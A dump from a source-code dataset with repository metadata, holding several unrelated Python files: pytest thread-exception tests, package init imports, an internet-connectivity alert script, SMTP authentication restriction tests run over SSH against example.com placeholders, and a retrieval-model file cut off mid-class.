5b7519f27d87a83dcd562f2f6ce7f53de5947a3d
| 4,085
|
py
|
Python
|
testing/test_threadexception.py
|
markshao/pytest
|
611b579d21f7e62b4c8ed54ab70fbfee7c6f5f64
|
[
"MIT"
] | 9,225
|
2015-06-15T21:56:14.000Z
|
2022-03-31T20:47:38.000Z
|
testing/test_threadexception.py
|
markshao/pytest
|
611b579d21f7e62b4c8ed54ab70fbfee7c6f5f64
|
[
"MIT"
] | 7,794
|
2015-06-15T21:06:34.000Z
|
2022-03-31T10:56:54.000Z
|
testing/test_threadexception.py
|
markshao/pytest
|
611b579d21f7e62b4c8ed54ab70fbfee7c6f5f64
|
[
"MIT"
] | 2,598
|
2015-06-15T21:42:39.000Z
|
2022-03-29T13:48:22.000Z
|
import sys
import pytest
from _pytest.pytester import Pytester
if sys.version_info < (3, 8):
pytest.skip("threadexception plugin needs Python>=3.8", allow_module_level=True)
@pytest.mark.filterwarnings("default::pytest.PytestUnhandledThreadExceptionWarning")
def test_unhandled_thread_exception(pytester: Pytester) -> None:
pytester.makepyfile(
test_it="""
import threading
def test_it():
def oops():
raise ValueError("Oops")
t = threading.Thread(target=oops, name="MyThread")
t.start()
t.join()
def test_2(): pass
"""
)
result = pytester.runpytest()
assert result.ret == 0
assert result.parseoutcomes() == {"passed": 2, "warnings": 1}
result.stdout.fnmatch_lines(
[
"*= warnings summary =*",
"test_it.py::test_it",
" * PytestUnhandledThreadExceptionWarning: Exception in thread MyThread",
" ",
" Traceback (most recent call last):",
" ValueError: Oops",
" ",
" warnings.warn(pytest.PytestUnhandledThreadExceptionWarning(msg))",
]
)
@pytest.mark.filterwarnings("default::pytest.PytestUnhandledThreadExceptionWarning")
def test_unhandled_thread_exception_in_setup(pytester: Pytester) -> None:
pytester.makepyfile(
test_it="""
import threading
import pytest
@pytest.fixture
def threadexc():
def oops():
raise ValueError("Oops")
t = threading.Thread(target=oops, name="MyThread")
t.start()
t.join()
def test_it(threadexc): pass
def test_2(): pass
"""
)
result = pytester.runpytest()
assert result.ret == 0
assert result.parseoutcomes() == {"passed": 2, "warnings": 1}
result.stdout.fnmatch_lines(
[
"*= warnings summary =*",
"test_it.py::test_it",
" * PytestUnhandledThreadExceptionWarning: Exception in thread MyThread",
" ",
" Traceback (most recent call last):",
" ValueError: Oops",
" ",
" warnings.warn(pytest.PytestUnhandledThreadExceptionWarning(msg))",
]
)
@pytest.mark.filterwarnings("default::pytest.PytestUnhandledThreadExceptionWarning")
def test_unhandled_thread_exception_in_teardown(pytester: Pytester) -> None:
pytester.makepyfile(
test_it="""
import threading
import pytest
@pytest.fixture
def threadexc():
def oops():
raise ValueError("Oops")
yield
t = threading.Thread(target=oops, name="MyThread")
t.start()
t.join()
def test_it(threadexc): pass
def test_2(): pass
"""
)
result = pytester.runpytest()
assert result.ret == 0
assert result.parseoutcomes() == {"passed": 2, "warnings": 1}
result.stdout.fnmatch_lines(
[
"*= warnings summary =*",
"test_it.py::test_it",
" * PytestUnhandledThreadExceptionWarning: Exception in thread MyThread",
" ",
" Traceback (most recent call last):",
" ValueError: Oops",
" ",
" warnings.warn(pytest.PytestUnhandledThreadExceptionWarning(msg))",
]
)
@pytest.mark.filterwarnings("error::pytest.PytestUnhandledThreadExceptionWarning")
def test_unhandled_thread_exception_warning_error(pytester: Pytester) -> None:
pytester.makepyfile(
test_it="""
import threading
import pytest
def test_it():
def oops():
raise ValueError("Oops")
t = threading.Thread(target=oops, name="MyThread")
t.start()
t.join()
def test_2(): pass
"""
)
result = pytester.runpytest()
assert result.ret == pytest.ExitCode.TESTS_FAILED
assert result.parseoutcomes() == {"passed": 1, "failed": 1}
| 29.601449
| 86
| 0.574541
| 367
| 4,085
| 6.275204
| 0.20436
| 0.036474
| 0.041685
| 0.086843
| 0.898393
| 0.898393
| 0.898393
| 0.866261
| 0.866261
| 0.840643
| 0
| 0.00673
| 0.308935
| 4,085
| 137
| 87
| 29.817518
| 0.809068
| 0
| 0
| 0.786325
| 0
| 0
| 0.552509
| 0.154712
| 0
| 0
| 0
| 0
| 0.068376
| 1
| 0.034188
| false
| 0.08547
| 0.08547
| 0
| 0.119658
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
751d377e6f4be7226dfb0167e80560decdaf06b5
| 185
|
py
|
Python
|
AgentRL/common/exploration/__init__.py
|
hemerson1/AgentRL
|
581727191ba81e1d7f57661511c856bc4c2725ad
|
[
"MIT"
] | null | null | null |
AgentRL/common/exploration/__init__.py
|
hemerson1/AgentRL
|
581727191ba81e1d7f57661511c856bc4c2725ad
|
[
"MIT"
] | null | null | null |
AgentRL/common/exploration/__init__.py
|
hemerson1/AgentRL
|
581727191ba81e1d7f57661511c856bc4c2725ad
|
[
"MIT"
] | null | null | null |
from AgentRL.common.exploration.base import base_exploration
from AgentRL.common.exploration.argmax import default_argmax
from AgentRL.common.exploration.e_greedy import epsilon_greedy
| 46.25
| 62
| 0.886486
| 25
| 185
| 6.4
| 0.44
| 0.20625
| 0.31875
| 0.525
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.064865
| 185
| 3
| 63
| 61.666667
| 0.924855
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
752ac90c2376d453e2923d72080fdab554003bb5
| 27
|
py
|
Python
|
tests/bind/good/fun-basic.py
|
Nakrez/RePy
|
057db55a99eac2c5cb3d622fa1f2e29f6083d8d6
|
[
"MIT"
] | 1
|
2020-11-24T05:24:26.000Z
|
2020-11-24T05:24:26.000Z
|
tests/bind/good/fun-basic.py
|
Nakrez/RePy
|
057db55a99eac2c5cb3d622fa1f2e29f6083d8d6
|
[
"MIT"
] | null | null | null |
tests/bind/good/fun-basic.py
|
Nakrez/RePy
|
057db55a99eac2c5cb3d622fa1f2e29f6083d8d6
|
[
"MIT"
] | null | null | null |
def x():
return 1
x()
| 5.4
| 12
| 0.444444
| 5
| 27
| 2.4
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.058824
| 0.37037
| 27
| 4
| 13
| 6.75
| 0.647059
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0
| 0.333333
| 0.666667
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
75477013e812c2f14ff538b13497fe972170729d
| 123
|
py
|
Python
|
pfdicom_agesort/__init__.py
|
FNNDSC/pfdicom_agesort
|
25ff52dd4215b6c9e97bd3339de8a2c3311190f2
|
[
"MIT"
] | null | null | null |
pfdicom_agesort/__init__.py
|
FNNDSC/pfdicom_agesort
|
25ff52dd4215b6c9e97bd3339de8a2c3311190f2
|
[
"MIT"
] | 1
|
2020-01-06T20:32:51.000Z
|
2020-01-06T20:32:51.000Z
|
pfdicom_agesort/__init__.py
|
FNNDSC/pfdicom_agesort
|
25ff52dd4215b6c9e97bd3339de8a2c3311190f2
|
[
"MIT"
] | null | null | null |
try:
from .pfdicom_agesort import pfdicom_agesort
except:
from pfdicom_agesort import pfdicom_agesort
| 24.6
| 54
| 0.723577
| 14
| 123
| 6.071429
| 0.428571
| 0.658824
| 0.423529
| 0.564706
| 0.894118
| 0.894118
| 0
| 0
| 0
| 0
| 0
| 0
| 0.252033
| 123
| 4
| 55
| 30.75
| 0.923913
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 9
|
755371a54534a6195823310f06fbd6c24bff977a
| 4,157
|
py
|
Python
|
checkinternet.py
|
digipodium/soil-health
|
bf42373d0e93950129854012de0b5cba849b5bf5
|
[
"MIT"
] | null | null | null |
checkinternet.py
|
digipodium/soil-health
|
bf42373d0e93950129854012de0b5cba849b5bf5
|
[
"MIT"
] | null | null | null |
checkinternet.py
|
digipodium/soil-health
|
bf42373d0e93950129854012de0b5cba849b5bf5
|
[
"MIT"
] | null | null | null |
def internet_on():
with open("error_log.csv", "a") as error_log:
error_log.write("\n{0},Log,Testing Internet connection.".format(strftime("%Y-%m-%d %H:%M:%S")))
global ledSwitch
global connected
global powerSwitch
try:
powerSwitch = 0
urllib.request.urlopen('http://216.58.207.206')
#urllib.urlopen('http://216.58.207.206', timeout=4)
with open("error_log.csv", "a") as error_log:
error_log.write("\n{0},Log,We have an internet connection.".format(strftime("%Y-%m-%d %H:%M:%S")))
ledSwitch = 1
Thread(target = led_green_alert).start()
try:
powerSwitch = 0
tts = gTTS(text="Code green! All communication systems are online and working within normal parameters." , lang='en')
tts.save("internet_on.mp3")
os.system("mpg321 -q internet_on.mp3")
except:
powerSwitch = 1
os.system("mpg321 -q internet_on_backup.mp3")
pass
connected = 1
ledSwitch = 0
time.sleep(2)
except:
powerSwitch = 1
with open("error_log.csv", "a") as error_log:
error_log.write("\n{0},Error,No internet connection.".format(strftime("%Y-%m-%d %H:%M:%S")))
ledSwitch = 1
Thread(target = led_red_alert).start()
try:
powerSwitch = 1
tts = gTTS(text="Alert! All communications are down. Alert! Systems running in emergency mode. Alert! Restoring communications, priority alpha." , lang='en')
tts.save("internet_off.mp3")
os.system("mpg321 -q internet_off.mp3")
os.system("mpg321 -q vader_breathe.mp3")
os.system("mpg321 -q vader_dont_fail.mp3")
except:
powerSwitch = 1
os.system("mpg321 -q internet_off_backup.mp3")
os.system("mpg321 -q vader_breathe.mp3")
os.system("mpg321 -q vader_dont_fail.mp3")
pass
connected = 0
ledSwitch = 0
time.sleep(2)
pass
def internet_on_thread():
global powerSwitch
global ledSwitch
global connected
while True:
time.sleep(180)
with open("error_log.csv", "a") as error_log:
error_log.write("\n{0},Log,Testing Internet connection.".format(strftime("%Y-%m-%d %H:%M:%S")))
if connected == 1:
try:
powerSwitch = 0
urllib.request.urlopen('http://216.58.207.206')
#urllib.urlopen('http://216.58.207.206', timeout=4)
with open("error_log.csv", "a") as error_log:
error_log.write("\n{0},Log,We have an internet connection.".format(strftime("%Y-%m-%d %H:%M:%S")))
connected = 1
except:
powerSwitch = 1
with open("error_log.csv", "a") as error_log:
error_log.write("\n{0},Error,No internet connection.".format(strftime("%Y-%m-%d %H:%M:%S")))
ledSwitch = 1
Thread(target = led_red_alert).start()
try:
powerSwitch = 1
tts = gTTS(text="Alert! All communications are down. Alert! Systems running in emergency mode. Alert! Restoring communications, priority alpha." , lang='en')
tts.save("internet_off.mp3")
os.system("mpg321 -q internet_off.mp3")
os.system("mpg321 -q vader_breathe.mp3")
os.system("mpg321 -q vader_dont_fail.mp3")
except:
powerSwitch = 1
os.system("mpg321 -q internet_off_backup.mp3")
os.system("mpg321 -q vader_breathe.mp3")
os.system("mpg321 -q vader_dont_fail.mp3")
pass
ledSwitch = 0
connected = 0
time.sleep(2)
pass
elif connected == 0:
try:
powerSwitch = 0
urllib.request.urlopen('http://216.58.192.142')
with open("error_log.csv", "a") as error_log:
error_log.write("\n{0},Log,We have an internet connection.".format(strftime("%Y-%m-%d %H:%M:%S")))
ledSwitch = 1
Thread(target = led_green_alert).start()
try:
powerSwitch = 0
tts = gTTS(text="Code green! All communication systems are online and working within normal parameters." , lang='en')
tts.save("internet_on.mp3")
os.system("mpg321 -q internet_on.mp3")
except:
powerSwitch = 1
os.system("mpg321 -q internet_on_backup.mp3")
pass
ledSwitch = 0
connected = 1
time.sleep(2)
except:
powerSwitch = 1
with open("error_log.csv", "a") as error_log:
error_log.write("\n{0},Error,No internet connection.".format(strftime("%Y-%m-%d %H:%M:%S")))
connected = 0
pass
| 28.472603
| 162
| 0.65095
| 615
| 4,157
| 4.297561
| 0.15935
| 0.072645
| 0.084752
| 0.090806
| 0.922058
| 0.889141
| 0.889141
| 0.889141
| 0.889141
| 0.872493
| 0
| 0.050686
| 0.193168
| 4,157
| 145
| 163
| 28.668966
| 0.737329
| 0.024056
| 0
| 0.9375
| 0
| 0.017857
| 0.385943
| 0.022195
| 0
| 0
| 0
| 0
| 0
| 1
| 0.017857
| false
| 0.0625
| 0
| 0
| 0.017857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
f346a51ff228c45801708345dc8718617de6148b
| 13,140
|
py
|
Python
|
remote_testing/restrictions_external_network.py
|
punktDe/python-remote-testing
|
5e9b51937e0564a280fd7504065ee5a5693c1e03
|
[
"MIT"
] | null | null | null |
remote_testing/restrictions_external_network.py
|
punktDe/python-remote-testing
|
5e9b51937e0564a280fd7504065ee5a5693c1e03
|
[
"MIT"
] | null | null | null |
remote_testing/restrictions_external_network.py
|
punktDe/python-remote-testing
|
5e9b51937e0564a280fd7504065ee5a5693c1e03
|
[
"MIT"
] | null | null | null |
"""
MIT License
Copyright (c) 2020 Lars Liedtke
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import unittest
import rpyc
import plumbum as pb
import smtplib
from email.message import EmailMessage
from rpyc.utils.zerodeploy import DeployedServer
class ExternalNetworkRestrictions(unittest.TestCase):
def test_logged_out_smtp_expect_client_host_rejected(self):
message = EmailMessage()
message["From"] = "sender@example.com"
message["To"] = "receiver@example.com"
message["Subject"] = "Test"
machine: pb.SshMachine = pb.SshMachine(host="remote.example.com", user="user",
keyfile="~/.ssh/id_rsa")
server = DeployedServer(machine)
connection: rpyc.Connection = server.classic_connect()
with connection.modules.smtplib.SMTP("mail.example.com") as smtp:
with self.assertRaises(smtplib.SMTPRecipientsRefused) as e:
smtp.send_message(message,
from_addr="sender@example.com",
to_addrs="receiver@example.com")
self.assertIn("Client host rejected: Access denied", str(e.exception))
connection.close()
server.close()
machine.close()
def test_logged_out_smtps_expect_client_host_rejected(self):
message = EmailMessage()
message["From"] = "sender@example.com"
message["To"] = "receiver@example.com"
message["Subject"] = "Test"
machine: pb.SshMachine = pb.SshMachine(host="remote.example.com", user="user",
keyfile="~/.ssh/id_rsa")
server = DeployedServer(machine)
connection: rpyc.Connection = server.classic_connect()
with connection.modules.smtplib.SMTP_SSL("mail.example.com", 465) as smtp:
with self.assertRaises(smtplib.SMTPRecipientsRefused) as e:
smtp.send_message(message,
from_addr="sender@example.com",
to_addrs="receiver@example.com")
self.assertIn("Client host rejected: Access denied", str(e.exception))
connection.close()
server.close()
machine.close()
def test_logged_out_starttls_expect_client_host_rejected(self):
message = EmailMessage()
message["From"] = "sender@example.com"
message["To"] = "receiver@example.com"
message["Subject"] = "Test"
machine: pb.SshMachine = pb.SshMachine(host="remote.example.com", user="proserver",
keyfile="~/.ssh/id_rsa")
server = DeployedServer(machine)
connection: rpyc.Connection = server.classic_connect()
with connection.modules.smtplib.SMTP("mail.example.com", 587) as smtp:
smtp.starttls()
with self.assertRaises(smtplib.SMTPRecipientsRefused) as e:
smtp.send_message(message,
from_addr="sender@example.com",
to_addrs="receiver@example.com")
self.assertIn("Client host rejected: Access denied", str(e.exception))
connection.close()
server.close()
machine.close()
def test_smtp_login_expect_reject(self):
message = EmailMessage()
message["From"] = "sender@example.com"
message["To"] = "receiver@example.com"
message["Subject"] = "Test"
machine: pb.SshMachine = pb.SshMachine(host="remote.example.com", user="proserver",
keyfile="~/.ssh/id_rsa")
server = DeployedServer(machine)
connection: rpyc.Connection = server.classic_connect()
with connection.modules.smtplib.SMTP("mail.example.com") as smtp:
with self.assertRaises(smtplib.SMTPNotSupportedError) as e:
smtp.login(user="user", password="test")
smtp.send_message(message,
from_addr="sender@example.com",
to_addrs="receiver@example.com")
self.assertIn("SMTP AUTH extension not supported by server", str(e.exception), msg=str(e.exception))
connection.close()
server.close()
machine.close()
def test_login_username_smtps_wrong_credentials_expect_rejected(self):
message = EmailMessage()
message["From"] = "sender@example.com"
message["To"] = "receiver@example.com"
message["Subject"] = "Test"
machine: pb.SshMachine = pb.SshMachine(host="remote.example.com", user="proserver",
keyfile="~/.ssh/id_rsa")
server = DeployedServer(machine)
connection: rpyc.Connection = server.classic_connect()
with connection.modules.smtplib.SMTP_SSL("mail.example.com", 465) as smtp:
with self.assertRaises(smtplib.SMTPAuthenticationError) as e:
smtp.login(user="user", password="test")
smtp.send_message(message,
from_addr="sender@example.com",
to_addrs="receiver@example.com")
self.assertIn("Error: authentication failed", str(e.exception), msg=str(e.exception))
connection.close()
server.close()
machine.close()
def test_login_username_starttls_wrong_credentials_expect_rejected(self):
message = EmailMessage()
message["From"] = "sender@example.com"
message["To"] = "receiver@example.com"
message["Subject"] = "Test"
machine: pb.SshMachine = pb.SshMachine(host="remote.example.com", user="proserver",
keyfile="~/.ssh/id_rsa")
server = DeployedServer(machine)
connection: rpyc.Connection = server.classic_connect()
with connection.modules.smtplib.SMTP("mail.example.com", 587) as smtp:
smtp.starttls()
with self.assertRaises(smtplib.SMTPAuthenticationError) as e:
smtp.login(user="user", password="test")
self.assertIn("Error: authentication failed", str(e.exception), msg=str(e.exception))
connection.close()
server.close()
machine.close()
def test_login_mailaddress_smtps_wrong_credentials_expect_rejected(self):
message = EmailMessage()
message["From"] = "sender@example.com"
message["To"] = "receiver@example.com"
message["Subject"] = "Test"
machine: pb.SshMachine = pb.SshMachine(host="remote.example.com", user="proserver",
keyfile="~/.ssh/id_rsa")
server = DeployedServer(machine)
connection: rpyc.Connection = server.classic_connect()
with connection.modules.smtplib.SMTP_SSL("mail.example.com",465) as smtp:
with self.assertRaises(smtplib.SMTPAuthenticationError) as e:
smtp.login(user="user@example.com", password="test")
self.assertIn("Error: authentication failed", str(e.exception), msg=str(e.exception))
connection.close()
server.close()
machine.close()
def test_login_mailaddress_starttls_wrong_credentials_expect_rejected(self):
message = EmailMessage()
message["From"] = "sender@example.com"
message["To"] = "receiver@example.com"
message["Subject"] = "Test"
machine: pb.SshMachine = pb.SshMachine(host="remote.example.com", user="proserver",
keyfile="~/.ssh/id_rsa")
server = DeployedServer(machine)
connection: rpyc.Connection = server.classic_connect()
with connection.modules.smtplib.SMTP("mail.example.com", 587) as smtp:
smtp.starttls()
with self.assertRaises(smtplib.SMTPAuthenticationError) as e:
smtp.login(user="user@example.com", password="test")
self.assertIn("Error: authentication failed", str(e.exception), msg=str(e.exception))
connection.close()
server.close()
machine.close()
def test_login_username_smtps_expect_pass(self):
message = EmailMessage()
message["From"] = "sender@example.com"
message["To"] = "receiver@example.com"
message["Subject"] = "Test"
machine: pb.SshMachine = pb.SshMachine(host="remote.example.com", user="proserver",
keyfile="~/.ssh/id_rsa")
server = DeployedServer(machine)
connection: rpyc.Connection = server.classic_connect()
with connection.modules.smtplib.SMTP_SSL("mail.example.com", 465) as smtp:
smtp.login(user="user", password="supersecret")
connection.close()
server.close()
machine.close()
def test_login_username_starttls_expect_pass(self):
message = EmailMessage()
message["From"] = "sender@example.com"
message["To"] = "receiver@example.com"
message["Subject"] = "Test"
machine: pb.SshMachine = pb.SshMachine(host="remote.example.com", user="proserver",
keyfile="~/.ssh/id_rsa")
server = DeployedServer(machine)
connection: rpyc.Connection = server.classic_connect()
with connection.modules.smtplib.SMTP("mail.example.com", 587) as smtp:
smtp.starttls()
smtp.login(user="user", password="supersecret")
connection.close()
server.close()
machine.close()
def test_login_mailaddress_smtps_expect_pass(self):
message = EmailMessage()
message["From"] = "sender@example.com"
message["To"] = "receiver@example.com"
message["Subject"] = "Test"
machine: pb.SshMachine = pb.SshMachine(host="remote.example.com", user="proserver",
keyfile="~/.ssh/id_rsa")
server = DeployedServer(machine)
connection: rpyc.Connection = server.classic_connect()
with connection.modules.smtplib.SMTP_SSL("mail.example.com", 465) as smtp:
smtp.login(user="user@example.com",
password="supersecret")
connection.close()
server.close()
machine.close()
def test_login_mailaddress_starttls_expect_pass(self):
message = EmailMessage()
message["From"] = "sender@example.com"
message["To"] = "receiver@example.com"
message["Subject"] = "Test"
machine: pb.SshMachine = pb.SshMachine(host="remote.example.com", user="proserver",
keyfile="~/.ssh/id_rsa")
server = DeployedServer(machine)
connection: rpyc.Connection = server.classic_connect()
with connection.modules.smtplib.SMTP("mail.example.com", 587) as smtp:
smtp.starttls()
smtp.login(user="user@example.com", password="supersecret")
connection.close()
server.close()
machine.close()
def test_logged_in_smtps_non_fqdn_helo_hostname_expect_pass(self):
message = EmailMessage()
message["From"] = "sender@example.com"
message["To"] = "receiver@example.com"
message["Subject"] = "Test"
machine: pb.SshMachine = pb.SshMachine(host="remote.example.com", user="proserver",
keyfile="~/.ssh/id_rsa")
server = DeployedServer(machine)
connection: rpyc.Connection = server.classic_connect()
with connection.modules.smtplib.SMTP_SSL("mail.example.com", 465) as smtp:
smtp.ehlo("test_helo")
smtp.login(user="user", password="supersecret")
smtp.send_message(message,
from_addr="sender@example.com",
to_addrs="receiver@example.com")
connection.close()
server.close()
machine.close()
if __name__ == '__main__':
unittest.main()
| 41.320755
| 112
| 0.607839
| 1,369
| 13,140
| 5.731191
| 0.133674
| 0.086668
| 0.056334
| 0.049707
| 0.845526
| 0.845526
| 0.836095
| 0.836095
| 0.836095
| 0.83533
| 0
| 0.003902
| 0.278387
| 13,140
| 317
| 113
| 41.451104
| 0.82356
| 0.081279
| 0
| 0.877729
| 0
| 0
| 0.174155
| 0
| 0
| 0
| 0
| 0
| 0.069869
| 1
| 0.056769
| false
| 0.065502
| 0.026201
| 0
| 0.087336
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
f36e6331171c2ac092b0b840854293f30950f7ee
| 92
|
py
|
Python
|
allennlp_series/data/__init__.py
|
harsh19/TRUCE
|
fb9fae76f87d007d0590b21a4de3739c860ba516
|
[
"MIT"
] | 1
|
2021-11-16T02:03:28.000Z
|
2021-11-16T02:03:28.000Z
|
allennlp_series/data/__init__.py
|
harsh19/TRUCE
|
fb9fae76f87d007d0590b21a4de3739c860ba516
|
[
"MIT"
] | null | null | null |
allennlp_series/data/__init__.py
|
harsh19/TRUCE
|
fb9fae76f87d007d0590b21a4de3739c860ba516
|
[
"MIT"
] | null | null | null |
from allennlp_series.data.fields import *
from allennlp_series.data.dataset_reader import *
| 30.666667
| 49
| 0.847826
| 13
| 92
| 5.769231
| 0.615385
| 0.32
| 0.48
| 0.586667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.086957
| 92
| 2
| 50
| 46
| 0.892857
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
f38be4c4345a4c579b1851137280e7c51589544f
| 52,454
|
py
|
Python
|
model/models.py
|
playing-code/ANCE_test
|
80ae493af4e771274153ba5ce0d5b1793b1d7e11
|
[
"MIT"
] | null | null | null |
model/models.py
|
playing-code/ANCE_test
|
80ae493af4e771274153ba5ce0d5b1793b1d7e11
|
[
"MIT"
] | null | null | null |
model/models.py
|
playing-code/ANCE_test
|
80ae493af4e771274153ba5ce0d5b1793b1d7e11
|
[
"MIT"
] | null | null | null |
import sys
sys.path += ['../']
import torch
from torch import nn
from transformers import (
RobertaConfig,
RobertaModel,
RobertaForSequenceClassification,
RobertaTokenizer,
BertModel,
BertTokenizer,
BertConfig,
BertForSequenceClassification,
ElectraTokenizer,
ElectraModel,
ElectraForSequenceClassification,
ElectraConfig
)
import torch.nn.functional as F
from data.process_fn import triple_process_fn, triple2dual_process_fn
from torch import Tensor as T
from typing import Tuple
# from fairseq.modules import (
# LayerNorm,
# MultiheadAttention,
# PositionalEmbedding,
# TransformerSentenceEncoderLayer,
# )
from fairseq.modules import (
TransformerSentenceEncoder,
)
from transformers import ElectraTokenizer, ElectraModel
from transformers import AutoTokenizer, AutoModel
import torch.distributed as dist
def is_first_worker():
return not dist.is_available() or not dist.is_initialized() or dist.get_rank() == 0
class EmbeddingMixin:
"""
Mixin for common functions in most embedding models. Each model should define its own bert-like backbone and forward.
We inherit from RobertaModel to use from_pretrained
"""
def __init__(self, model_argobj):
if model_argobj is None:
self.use_mean = False
else:
self.use_mean = model_argobj.use_mean
print("Using mean:", self.use_mean)
def _init_weights(self, module):
""" Initialize the weights """
if isinstance(module, (nn.Linear, nn.Embedding, nn.Conv1d)):
# Slightly different from the TF version which uses truncated_normal for initialization
# cf https://github.com/pytorch/pytorch/pull/5617
module.weight.data.normal_(mean=0.0, std=0.02)
def masked_mean(self, t, mask):
s = torch.sum(t * mask.unsqueeze(-1).float(), axis=1)
d = mask.sum(axis=1, keepdim=True).float()
return s / d
def masked_mean_or_first(self, emb_all, mask):
# emb_all is a tuple from bert - sequence output, pooler
if isinstance(emb_all, tuple):
if self.use_mean:
return self.masked_mean(emb_all[0], mask)
else:
return emb_all[0][:, 0]
else:
#print('!!!',emb_all.shape)
if self.use_mean:
return self.masked_mean(emb_all, mask)
else:
#print('??? should be the first')
return emb_all[:, 0]
def query_emb(self, input_ids, attention_mask):
raise NotImplementedError("Please Implement this method")
def body_emb(self, input_ids, attention_mask):
raise NotImplementedError("Please Implement this method")
class NLL(EmbeddingMixin):
    """Pairwise NLL loss over (query, positive passage, negative passage) triples.

    With no negative supplied, acts as a plain embedder (inference mode).
    """

    def forward(
            self,
            query_ids,
            attention_mask_q,
            input_ids_a=None,
            attention_mask_a=None,
            input_ids_b=None,
            attention_mask_b=None,
            is_query=True):
        # Inference: only one input present — just embed it.
        if input_ids_b is None:
            if is_query:
                return self.query_emb(query_ids, attention_mask_q)
            return self.body_emb(query_ids, attention_mask_q)

        q_embs = self.query_emb(query_ids, attention_mask_q)
        a_embs = self.body_emb(input_ids_a, attention_mask_a)
        b_embs = self.body_emb(input_ids_b, attention_mask_b)

        # Dot-product scores; column 0 is the positive passage.
        pos_scores = (q_embs * a_embs).sum(-1).unsqueeze(1)
        neg_scores = (q_embs * b_embs).sum(-1).unsqueeze(1)
        logit_matrix = torch.cat([pos_scores, neg_scores], dim=1)  # [B, 2]

        lsm = F.log_softmax(logit_matrix, dim=1)
        loss = -1.0 * lsm[:, 0]
        # Pairwise accuracy: fraction of triples where the positive outranks the negative.
        acc = lsm[:, 0] > lsm[:, 1]
        return (loss.mean(), acc.float().mean())
class NLL_concat(EmbeddingMixin):
    """NLL loss for models whose body encoder already emits a single relevance logit.

    The positive and negative logits are concatenated and softmaxed directly.
    """

    def forward(
            self,
            input_ids_a=None,
            attention_mask_a=None,
            input_ids_b=None,
            attention_mask_b=None,
            is_query=True):
        pos_logits = self.body_emb(input_ids_a, attention_mask_a)
        neg_logits = self.body_emb(input_ids_b, attention_mask_b)
        # Column 0 is the positive passage's logit.
        logit_matrix = torch.cat([pos_logits, neg_logits], dim=1)  # [B, 2]
        lsm = F.log_softmax(logit_matrix, dim=1)
        loss = -1.0 * lsm[:, 0]
        return (loss.mean(),)
class RobertaDot_NLL_LN_fairseq_fast_concat(NLL_concat, nn.Module):
    """Fairseq RoBERTa encoder whose head maps the pooled state to one relevance logit."""

